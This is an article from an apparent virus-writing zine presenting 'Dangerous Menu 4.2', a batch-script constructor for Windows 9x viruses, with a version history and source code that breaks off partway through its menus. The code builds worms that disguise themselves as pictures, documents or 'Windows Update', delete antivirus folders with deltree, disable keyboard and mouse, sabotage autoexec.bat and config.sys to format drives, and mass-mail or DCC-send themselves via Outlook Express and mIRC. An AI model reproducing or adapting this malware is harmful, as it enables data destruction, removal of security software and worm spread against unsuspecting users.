Redemption
| Last article | Table of contents | Next article |
|---|
| Last article | Table of contents | Next article |
|---|
Strange Article - Dangerous Menu version 4.2 by DvL
Homepage: www.geocities.com/ratty_dvl/BATch/main.htm
+------------+
¦ DISCLAIMER ¦
+------------+
USE this utility at YOUR OWN RISK !!!
I'm NOT responsible for any damage caused to your or any other computer ...
Dangerous Menu has been extensively tested with Win95/IE 5 and it works fine on
my IBM PC/233 mhz, 64 MB memory, 200 MB hard drive, I can't say how well it will
work on your system.
After downloading or starting the program u r responsible for your actions.
Use the program only if u have a clean windows installation, and use it with no
applications opened. (FOR YOUR OWN GOOD), u must have the last wsh update (it works
with older versions, too)
This program was only designed for win9x & winme, and not for winxp or any other
windoze.
This program only teaches u some batch, some vbscript and many more ... DON`T use
it for spreading or anything else, learn something from it ;)
I`ve spent many hours learning batch, vbscript and the rest, don`t rip DM, try to
understand the scripts, try to see what they do, but only on a safe computer, use
Deep Freeze to freeze your files and to safely try the virii.
If u want to report a bug or you want to ask me anything mail me.
Credits and thanx:
~~~~~~~~~~~~~~~~~
- SpTh - for config.sys infection, articles, virii, e-mails
- SAD1c - for Bat.Micromorph, Bat.Terror1st, articles, bug reportz, e-mails
- Timormortis - for his .reg used on SSHARE2
- Philet0a$t3r - for his batch random number generator, virii, e-mails
- Alcopaul - debug scripter, articles, virii
History:
~~~~~~~~
[*] version 4.2 - 07.10.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- the whole body of DM is now created with the power of vbscript but written in
batch ;), this helped me to solve many problems and I`ve gained smaller virii
and a smaller constructor
- killed "Trojan.BAT.KillAll.c" from Kaspersky AV
- removed some unuseful lines
- improved the stealth/hidden sharing, now its very small, idea from
Bat.Terror1st of SAD1c (result is a smaller virus, 5-10 kb smaller)
- improved the random number generator and added random letter generator(10x SpTh)
- unharmful payloads option was replaced with "Desktop payload (Fill desktop with
undeletable folders)", this folders (99) are undeletable even for ms-dos
- "break off" was added in virus installation
- improved "spreading by copy on all disks" (smaller virii) (ideea from a virus of
SAD1c)
- added more antiviruses for removing, also some spyware and some firewalls
- fixed a big number of small bugs :)
- the resulted virii (with all option) r between 14 and 17 kb (worked a lot to make
them so small)
[*] version 4.1 - 08.09.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- I hope that KAV will detect it from now on like Constructor.BAT.DM.xx or
something like that because I hate seeing my constructor named as a droper
- the prog is smaller now, it was checked and remade
- the virii are more effective now
- retro is better now: added more av`z for deletion
- I`ve used philet0a$t3r`z brng to produce random fake bytes but I didn`t
have time to improve it, next time I think ...
- infection and dropping are better
- unharmful payloads option added
- killed some virii
- a lot of tiny and stupid bugs were fixed
- now the created virii can spread via p2p too
[*] version 4.0 - 04.08.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- new option: create hidden shares on all drives,
works on win 95/98/NT4/ME/2000/XP
[from SSHARE2 by TiMoRmOrTiS]
- new option: restart the computer forced
[from SAD1c`s article]
- fixed 8 small bugs
[*] version 3.9 - 02.08.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- some other AV`z added for deletion
- added mutamorphic fake bytes for win9x and winxp
- fixed a lot of small bugs
[*] version 3.8 - 16.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- added floppy [a:\ drive] dropping, the virus will copy itself to "a:\"
drive only if a disk exists in the drive [from EricHelps]
[*] version 3.7 - 12.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- killed some virii
- fixed several bugs [with help from SAD1c]
- changed the pirch worm
[*] version 3.6 - 09.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- fixed an important bug, when I was redirecting data with echo, instead
of %% I obtained %. The bug was fixed by puting %%%% and obtaining %%.
- added .vbs file infection/dropping
- added .js file infection/dropping
- fixed several little bugs
[*] version 3.5 - 08.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- added (QBasic) .bas file infection/dropping
- added in autoexec.bat dropping another shit: it checks what
day it is and for every day it has a payload
- fixed some very stupid bugs with the echo command
[*] version 3.4 - 07.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- now, DM checks to see if your pc is running winXP, if
winXP is found the program ends
- removed some dangerous payloads from autoexec.bat droping
- better autoexec.bat and config.sys droping
- added .bat dropping
- few changes in the program (only to make it better)
[*] version 3.3 - 07.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- the retro part is now better and more powerful
- added autoexec.bat infection/dropping
- added config.sys infection/dropping
- little changes and some bugs are now fixed
[*] version 3.2 - 06.07.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- added virc spreading
- added kazaa spreading
- added .lnk dropping
- fixed some minor bugs
[*] version 3.1 - 27.06.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- my DMenu evolved [again]: from a dropper to a constructor.
- Features: - choose between eicar, fake bytes and both of them
- choose between keyboard and mouse disabled and swap mouse buttons
- retro [it deletes almost all known AV`z]
- autoexec.bat payloadz
- Outlook Express spreading
- mIRC spreading
- pIRCh spreading
- pif infector
[*] version 3.0 - 18.05.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- Dropped files: -> the Hippie viruz for win9x and winXP
-> the BoogieMan viruz for winXP
-> the Hool-i-Gun viruz for winXP
-> the RemAV viruz for winXP
-> the BATlle-Field.b viruz for winXP
[*] version 2.1 - 06.05.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- Dropped files: -> a file which will change the sizes from some IMPORTANT files to 0 bytes
-> a file which will delete some IMPORTANT files with the COPY command
-> a file which will try to format the a,c,d,e drives
-> a file which will try to delete all files from drive c
-> a file which will try to overwrite all files from drive c
[*] version 2.0 - 12.03.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- the third version of DMenu is written [ya, the third version]
- my DMenu evolved: from a trojan to a dropper.
- Dropped files: -> a file which will delete everything from desktop
-> a file which will delete all command.com files
-> a file which will delete everything from My Documents
-> a file which will delete the windows password files
-> a file which will try to delete all your files
[*] version 1.1 - 12.03.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- the second version of DMenu is written.
- like his predecesor, but newer commands option in menu,
- Features: - Delete files from system folder
- Format drive d
- Format drive a
- Restart computer
[*] version 1.0 - 11.03.2003:
=-=-=-=-=-=-=-=-=-=-=-=-=
- the first version of DMenu is written
- it`s the first trojan which can "satisfy" your pleasure from his menu
- Deletes: - everything from usual win9x desktop
- all command.com files on your pc
- all files from My Documents
- win password files [.pwl]
=====[begin code]===============================================================
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
set _=batvirus.vbs
set !=errorlevel
set .=echo.b.Writeline
ctty con
cls
echo.
echo.
echo.
echo ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»
echo ³ °±²Û Dangerous Menu 4.2 Û²±° ³ [DvL]
echo ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ
echo.
echo.
echo. Fooling AV`z
echo ÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo 1 - EICAR
echo.
echo 2 - Fake bytes
echo.
echo 3 - EICAR & fake bytes
echo.
echo 4 - Next page
echo.
echo Q - e X i t
echo.
choice /c:1234Q>nul
if %!% 5 goto end
if %!% 4 goto a4
if %!% 3 goto a3
if %!% 2 goto a2
if %!% 1 goto a1
goto done
:a1
cls
ctty nul
echo.randomize(timer)>%_%
echo.set a=CreateObject("scripting.filesystemobject")>>%_%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%_%
%.% "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>%_%
%.% ":: Generated by Dangerous Menu [DvL]">>%_%
%.% "@echo off">>%_%
%.% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %!% 1 ctty nul"&chr(124)&"if not %!% 1 exit">>%_%
%.% "break off">>%_%
echo.c="">>%_%
echo.d=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To d>>%_%
echo.c=c&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "md %%windir%%\system\"&c&" >nul">>%_%
%.% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"VAGIN.url.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"PuSSy.jpg.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"24 cm.gif.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"11 september.doc.bat"&Chr(34)&" >nul">>%_%
echo.e="">>%_%
echo.f=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To f>>%_%
echo.e=e&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&e&"=deltree/y c:\">>%_%
echo.g="">>%_%
echo.h=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To h>>%_%
echo.g=g&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&g&"=progra~1\">>%_%
%.% chr(37)&e&chr(37)&"windows\startm~1\"&" >nul">>%_%
%.% "copy %%0 %%windir%%\startm~1\"&Chr(34)&"Windows Update.exe.bat"&Chr(34)&" >nul">>%_%
ctty con
goto 001
:a2
cls
ctty nul
echo.randomize(timer)>%_%
echo.set a=CreateObject("scripting.filesystemobject")>>%_%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%_%
echo.c=int((rnd*9999999999999)+1)>>%_%
echo.d=int((rnd*9999999999999)+1)>>%_%
echo.e=int((rnd*9999999999999)+1)>>%_%
echo.f=int((rnd*9999999999999)+1)>>%_%
echo.g=int((rnd*9999999999999)+1)>>%_%
echo.b.Write c&d&e&f&g&c&d&e&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write d&e&f&g&c&d&e&f&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write e&f&g&c&d&e&f&g&c>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write f&g&c&d&e&f&g&c&d>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write g&c&d&e&f&g&c&d&e>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write c&d&e&f&g&c&d&e&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write d&e&f&g&c&d&e&f&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write e&f&g&c&d&e&f&g&c>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write f&g&c&d&e&f&g&c&d>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write g&c&d&e&f&g&c&d&e>>%_%
echo.b.WriteBlankLines "1">>%_%
%.% ":: Generated by Dangerous Menu [DvL]">>%_%
%.% "@echo off">>%_%
%.% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %!% 1 ctty nul"&chr(124)&"if not %!% 1 exit">>%_%
%.% "break off">>%_%
echo.c="">>%_%
echo.d=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To d>>%_%
echo.c=c&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "md %%windir%%\system\"&c&" >nul">>%_%
%.% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"VAGIN.url.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"PuSSy.jpg.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"24 cm.gif.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"11 september.doc.bat"&Chr(34)&" >nul">>%_%
echo.e="">>%_%
echo.f=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To f>>%_%
echo.e=e&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&e&"=deltree/y c:\">>%_%
echo.g="">>%_%
echo.h=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To h>>%_%
echo.g=g&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&g&"=progra~1\">>%_%
%.% chr(37)&e&chr(37)&"windows\startm~1\"&" >nul">>%_%
%.% "copy %%0 %%windir%%\startm~1\"&Chr(34)&"Windows Update.exe.bat"&Chr(34)&" >nul">>%_%
ctty con
goto 001
:a3
cls
ctty nul
echo.randomize(timer)>%_%
echo.set a=CreateObject("scripting.filesystemobject")>>%_%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%_%
%.% "X5O!P%%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*">>%_%
echo.c=int((rnd*9999999999999)+1)>>%_%
echo.d=int((rnd*9999999999999)+1)>>%_%
echo.e=int((rnd*9999999999999)+1)>>%_%
echo.f=int((rnd*9999999999999)+1)>>%_%
echo.g=int((rnd*9999999999999)+1)>>%_%
echo.b.Write c&d&e&f&g&c&d&e&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write d&e&f&g&c&d&e&f&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write e&f&g&c&d&e&f&g&c>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write f&g&c&d&e&f&g&c&d>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write g&c&d&e&f&g&c&d&e>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write c&d&e&f&g&c&d&e&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write d&e&f&g&c&d&e&f&f>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write e&f&g&c&d&e&f&g&c>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write f&g&c&d&e&f&g&c&d>>%_%
echo.b.WriteBlankLines "1">>%_%
echo.b.Write g&c&d&e&f&g&c&d&e>>%_%
echo.b.WriteBlankLines "1">>%_%
%.% ":: Generated by Dangerous Menu [DvL]">>%_%
%.% "@echo off">>%_%
%.% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %!% 1 ctty nul"&chr(124)&"if not %!% 1 exit">>%_%
%.% "break off">>%_%
echo.c="">>%_%
echo.d=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To d>>%_%
echo.c=c&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "md %%windir%%\system\"&c&" >nul">>%_%
%.% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"VAGIN.url.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"PuSSy.jpg.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"24 cm.gif.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"11 september.doc.bat"&Chr(34)&" >nul">>%_%
echo.e="">>%_%
echo.f=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To f>>%_%
echo.e=e&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&e&"=deltree/y c:\">>%_%
echo.g="">>%_%
echo.h=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To h>>%_%
echo.g=g&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&g&"=progra~1\">>%_%
%.% chr(37)&e&chr(37)&"windows\startm~1\"&" >nul">>%_%
%.% "copy %%0 %%windir%%\startm~1\"&Chr(34)&"Windows Update.exe.bat"&Chr(34)&" >nul">>%_%
ctty con
goto 001
:a4
cls
ctty nul
echo.randomize(timer)>%_%
echo.set a=CreateObject("scripting.filesystemobject")>>%_%
echo.set b=a.CreateTextFile ("batvirus.txt")>>%_%
%.% ":: Generated by Dangerous Menu [DvL]">>%_%
%.% "@echo off">>%_%
%.% "@ver"&chr(124)&"find "&chr(34)&"XP"&chr(34)&chr(124)&"if %!% 1 ctty nul"&chr(124)&"if not %!% 1 exit">>%_%
%.% "break off">>%_%
echo.c="">>%_%
echo.d=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To d>>%_%
echo.c=c&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "md %%windir%%\system\"&c&" >nul">>%_%
%.% "copy %%0 %%windir%%\system\"&c&"\tmpdelis.bat"&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"VAGIN.url.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 %%windir%%\desktop\"&Chr(34)&"PuSSy.jpg.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"24 cm.gif.bat"&Chr(34)&" >nul">>%_%
%.% "copy %%0 c:\mydocu~1\"&Chr(34)&"11 september.doc.bat"&Chr(34)&" >nul">>%_%
echo.e="">>%_%
echo.f=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To f>>%_%
echo.e=e&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&e&"=deltree/y c:\">>%_%
echo.g="">>%_%
echo.h=int(rnd(1)*8)+1>>%_%
echo.for lettre=1 To h>>%_%
echo.g=g&chr(int(rnd(1)*26)+97)>>%_%
echo.next>>%_%
%.% "set "&g&"=progra~1\">>%_%
%.% chr(37)&e&chr(37)&"windows\startm~1\"&" >nul">>%_%
%.% "copy %%0 %%windir%%\startm~1\"&Chr(34)&"Windows Update.exe.bat"&Chr(34)&" >nul">>%_%
ctty con
:001
cls
echo.
echo.
echo.
echo Mouse & keyboard payloads
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Disable mouse & keyboard
echo.
echo 2 - Disable keyboard & swap mouse buttons
echo.
echo 3 - Next page
echo.
echo Q - e X i t
echo.
choice /c:123Q>nul
if %!% 4 goto done
if %!% 3 goto 002
if %!% 2 goto a6
if %!% 1 goto a5
goto done
:a5
cls
ctty nul
%.% "rundll32 mouse,disable">>%_%
%.% "rundll32 keyboard,disable">>%_%
ctty con
goto 002
:a6
cls
ctty nul
%.% "rundll32 user,swapmousebutton">>%_%
%.% "rundll32 keyboard,disable">>%_%
ctty con
:002
cls
echo.
echo.
echo.
echo Atack AV`z
echo ÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Do retro
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 003
if %!% 1 goto a7
goto done
:a7
cls
ctty nul
set &=chr(37)&e&chr(37)&
%.% %&%"antiba~1\ >nul">>%_%
%.% %&%"antiba~2\ >nul">>%_%
%.% %&%"antiba~1.1\ >nul">>%_%
%.% %&%"antiba~1.2\ >nul">>%_%
%.% %&%"antiba~1.3\ >nul">>%_%
%.% %&%"antiba~1.4\ >nul">>%_%
%.% %&%"antiba~1.5\ >nul">>%_%
%.% %&%"antiba~1.6\ >nul">>%_%
%.% %&%"antiba~1.7\ >nul">>%_%
%.% %&%"antiba~1.8\ >nul">>%_%
%.% %&%"antivi~1\ >nul">>%_%
%.% %&%"antivi~2\ >nul">>%_%
%.% %&%"antiviru\ >nul">>%_%
%.% %&%"avg\ >nul">>%_%
%.% %&%"avp\ >nul">>%_%
%.% %&%"avp30\ >nul">>%_%
%.% %&%"avx\ >nul">>%_%
%.% %&%"avpers~1\ >nul">>%_%
%.% %&%"bitdef~1\ >nul">>%_%
%.% %&%"bitdef~2\ >nul">>%_%
%.% %&%"comman~1\ >nul">>%_%
%.% %&%"cleancih\ >nul">>%_%
%.% %&%"esafen\ >nul">>%_%
%.% %&%"findvi~1\ >nul">>%_%
%.% %&%"f-macro\ >nul">>%_%
%.% %&%"f-prot\ >nul">>%_%
%.% %&%"f-prot95\ >nul">>%_%
%.% %&%"f-secu~1\ >nul">>%_%
%.% %&%"fwin\ >nul">>%_%
%.% %&%"fwin32\ >nul">>%_%
%.% %&%"inocul~1\ >nul">>%_%
%.% %&%"inocul~2\ >nul">>%_%
%.% %&%"kasper~1\ >nul">>%_%
%.% %&%"kasper~2\ >nul">>%_%
%.% %&%"mcafee\ >nul">>%_%
%.% %&%"mcafee~1\ >nul">>%_%
%.% %&%"msav\ >nul">>%_%
%.% %&%"norman\ >nul">>%_%
%.% %&%"norton~1\ >nul">>%_%
%.% %&%"norton~2\ >nul">>%_%
%.% %&%"pav\ >nul">>%_%
%.% %&%"pccill~1\ >nul">>%_%
%.% %&%"pc-cil~1\ >nul">>%_%
%.% %&%"rav\ >nul">>%_%
%.% %&%"softwin\ >nul">>%_%
%.% %&%"tbav\ >nul">>%_%
%.% %&%"tbavw95\ >nul">>%_%
%.% %&%"toolkit\ >nul">>%_%
%.% %&%"trendm~1\ >nul">>%_%
%.% %&%"trex\ >nul">>%_%
%.% %&%"virus\ >nul">>%_%
%.% %&%"vpc\ >nul">>%_%
%.% %&%"vs95\ >nul">>%_%
%.% %&%"zonela~1\ >nul">>%_%
%.% %&%"zonela~2\ >nul">>%_%
set &=chr(37)&e&chr(37)&chr(37)&g&chr(37)&
%.% %&%"antiba~1\ >nul">>%_%
%.% %&%"antiba~2\ >nul">>%_%
%.% %&%"antiba~1.1\ >nul">>%_%
%.% %&%"antiba~1.2\ >nul">>%_%
%.% %&%"antiba~1.3\ >nul">>%_%
%.% %&%"antiba~1.4\ >nul">>%_%
%.% %&%"antiba~1.5\ >nul">>%_%
%.% %&%"antiba~1.6\ >nul">>%_%
%.% %&%"antiba~1.7\ >nul">>%_%
%.% %&%"antiba~1.8\ >nul">>%_%
%.% %&%"antivi~1\ >nul">>%_%
%.% %&%"antivi~2\ >nul">>%_%
%.% %&%"avg\ >nul">>%_%
%.% %&%"avp\ >nul">>%_%
%.% %&%"avx\ >nul">>%_%
%.% %&%"avx2000\ >nul">>%_%
%.% %&%"avpers~1\ >nul">>%_%
%.% %&%"bitdef~1\ >nul">>%_%
%.% %&%"bitdef~2\ >nul">>%_%
%.% %&%"comman~1\ >nul">>%_%
%.% %&%"common~1\avpsha~1\ >nul">>%_%
%.% %&%"common~1\symant~1\ >nul">>%_%
%.% %&%"datafe~1\ >nul">>%_%
%.% %&%"deerfi~1.com\ >nul">>%_%
%.% %&%"f-prot\ >nul">>%_%
%.% %&%"f-prot95\ >nul">>%_%
%.% %&%"findvi~1\ >nul">>%_%
%.% %&%"f-secu~1\ >nul">>%_%
%.% %&%"f-secure\ >nul">>%_%
%.% %&%"fsi\ >nul">>%_%
%.% %&%"fwin\ >nul">>%_%
%.% %&%"fwin32\ >nul">>%_%
%.% %&%"grisoft\ >nul">>%_%
%.% %&%"inocul~1\ >nul">>%_%
%.% %&%"inocul~2\ >nul">>%_%
%.% %&%"intern~2\ >nul">>%_%
%.% %&%"kasper~1\ >nul">>%_%
%.% %&%"kasper~2\ >nul">>%_%
%.% %&%"mcafee\ >nul">>%_%
%.% %&%"mcafee~1\ >nul">>%_%
%.% %&%"mindso~1\ >nul">>%_%
%.% %&%"norman\ >nul">>%_%
%.% %&%"norton~1\ >nul">>%_%
%.% %&%"norton~2\ >nul">>%_%
%.% %&%"pandas~1\ >nul">>%_%
%.% %&%"protec~1\ >nul">>%_%
%.% %&%"protec~2\ >nul">>%_%
%.% %&%"quickh~1\ >nul">>%_%
%.% %&%"rav\ >nul">>%_%
%.% %&%"signal9\ >nul">>%_%
%.% %&%"softwin\ >nul">>%_%
%.% %&%"spysto~1\ >nul">>%_%
%.% %&%"symant~1\ >nul">>%_%
%.% %&%"tbav\ >nul">>%_%
%.% %&%"tinype~1\ >nul">>%_%
%.% %&%"trendm~1\ >nul">>%_%
%.% %&%"trendp~1\ >nul">>%_%
%.% %&%"trojan~1\ >nul">>%_%
%.% %&%"trojan~2\ >nul">>%_%
%.% %&%"virusm~1.0\ >nul">>%_%
%.% %&%"zonela~1\ >nul">>%_%
%.% %&%"zonela~2\ >nul">>%_%
set &=
ctty con
:003
cls
echo.
echo.
echo.
echo Autoexec.bat & Config.sys infection
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Infect autoexec.bat & config.sys
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 004
if %!% 1 goto a8
goto done
:a8
cls
ctty nul
%.% "echo.time 00:00:00,00>>c:\autoexec.bat">>%_%
%.% "echo.date 80-01-01>>c:\autoexec.bat">>%_%
%.% "echo.%%comspec%% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat">>%_%
%.% "echo.%%comspec%% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat">>%_%
%.% "echo.%%comspec%% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat">>%_%
%.% "echo.[menu]>c:\config.sys">>%_%
%.% "echo.menuitem="&g&">>c:\config.sys">>%_%
%.% "echo.>>c:\config.sys">>%_%
%.% "echo.["&g&"]>>c:\config.sys">>%_%
%.% "echo.buffers=1>>c:\config.sys">>%_%
%.% "echo.files=1>>c:\config.sys">>%_%
%.% "echo.lastdrive=A>>c:\config.sys">>%_%
%.% "echo.set path="&chr(37)&e&chr(37)&">>c:\config.sys">>%_%
%.% "echo.set temp=A:\>>c:\config.sys">>%_%
%.% "echo.set windir=format c:/u/q/autotest>>c:\config.sys">>%_%
ctty con
:004
cls
echo.
echo.
echo.
echo Outlook Express worm
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via Outlook Express
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 005
if %!% 1 goto a9
goto done
:a9
cls
ctty nul
%.% "echo.set a=Wscript.CreateObject("&chr(34)&"Wscript.Shell"&chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.set b=CreateObject("&chr(34)&"Outlook.Application"&chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.set c=b.GetNameSpace("&chr(34)&"MAPI"&chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.for y=1 To c.AddressLists.Count>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.set d=c.AddressLists(y)>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.x=1>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.set e=b.CreateItem(0)>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.for o=1 To d.AddressEntries.Count>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.f=d.AddressEntries(x)>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.Recipients.Add f>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.x=x+1>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.Subject="&chr(34)&"RE: Hy !"&chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.Body="&chr(34)&"RE: Hy !"&chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.Attachments.Add ("&chr(34)&"%%windir%%\system\"&c&"\tmpdelis.bat"&chr(34)&")>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.DeleteAfterSubmit=False>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.e.Send>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.f="&chr(34)&chr(34)&">>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "echo.next>>%%windir%%\system\"&c&"\"&c&".vbs">>%_%
%.% "cscript %%windir%%\system\"&c&"\"&c&".vbs">>%_%
ctty con
:005
cls
echo.
echo.
echo.
echo IRC worm
echo ÄÄÄÄÄÄÄÄ
echo.
echo.
echo 1 - Spread via IRC
echo.
echo 2 - Next page
echo.
echo Q - e X i t
echo.
choice /c:12Q>nul
if %!% 3 goto done
if %!% 2 goto 006
if %!% 1 goto a10
goto done
:a10
cls
ctty nul
%.% "echo.[script]>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.n0=on 1:JOIN:#:{>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.n1=/if ( $nick == $me ) { halt }>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.n2=/dcc send $nick %%windir%%\system\"&c&"\tmpdelis.bat>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% "echo.n3=}>>%%windir%%\system\"&c&"\"&c&".ini">>%_%
%.% chr(37)&e&chr(37)&"mirc\script.ini >nul">>"%_%
%.% chr(37)&e&chr(37)&"mirc32\script.ini >nul">>"%_%
%.% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc\script.ini >nul">>%_%
%.% chr(37)&e&chr(37)&chr(37)&g&chr(37)&"mirc32\script.ini >nul">>%_%
